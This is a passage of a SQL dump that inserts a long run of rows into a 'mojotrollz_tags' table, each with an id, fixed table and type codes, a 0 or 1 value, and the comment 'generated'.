`type`, `value`, `comment`) VALUES (452, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (453, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (454, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (455, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (456, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (457, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (458, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (459, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (463, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (464, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (465, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (466, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (467, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (468, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (469, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (470, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (471, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (472, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (473, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (475, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (476, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (477, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (479, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (480, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (481, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (482, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (483, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (484, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (486, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (487, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (488, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (489, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (492, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (493, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (494, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (495, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (496, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (498, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (499, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (500, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (501, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (502, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (503, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (504, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (505, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (506, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (507, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (508, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (509, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (512, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (513, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (514, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (515, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (516, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (517, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (518, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (519, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (520, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (521, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (523, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (524, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (525, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (526, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (527, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (528, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (529, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (530, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (531, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (532, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (533, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (535, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (536, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (537, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (538, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (539, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (540, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (541, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (542, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (543, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (544, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (545, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (546, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (547, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (550, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (552, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (553, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (554, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (555, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (556, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (557, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (558, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (559, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (560, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (561, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (562, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (563, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (564, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (565, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (568, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (569, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (570, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (571, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (572, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (573, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (574, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (575, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (576, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (577, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (578, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (579, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (580, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (581, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (582, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (583, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (584, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (587, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (589, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (590, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (591, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (592, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (593, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (595, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (596, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (598, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (599, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (600, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (601, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (602, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (603, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (604, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (605, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (606, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (607, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (608, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (609, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (610, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (611, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (613, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (614, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (615, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (616, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (617, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (618, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (621, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (622, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (623, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (627, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (628, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (629, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (630, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (631, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (633, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (634, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (638, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (639, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (640, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (641, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (643, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (644, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (645, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (647, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (648, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (649, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (650, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (655, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (656, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (657, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (658, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (659, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (660, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (661, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (662, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (663, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (664, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (665, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (666, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (667, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (668, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (669, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (670, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (671, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (672, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (673, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (674, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (675, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (676, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (677, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (678, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (679, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (680, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (681, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (682, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (683, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (686, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (687, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (689, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (690, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (691, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (692, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (693, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (694, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (695, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (696, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (697, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (698, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (699, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (700, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (701, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (702, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (703, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (704, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (705, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (706, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (707, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (709, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (710, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (711, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (712, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (713, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (714, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (715, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (716, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (717, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (718, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (719, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (721, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (722, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (723, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (724, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (725, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (726, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (727, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (728, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (729, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (730, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (731, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (732, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (733, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (734, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (735, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (736, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (737, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` 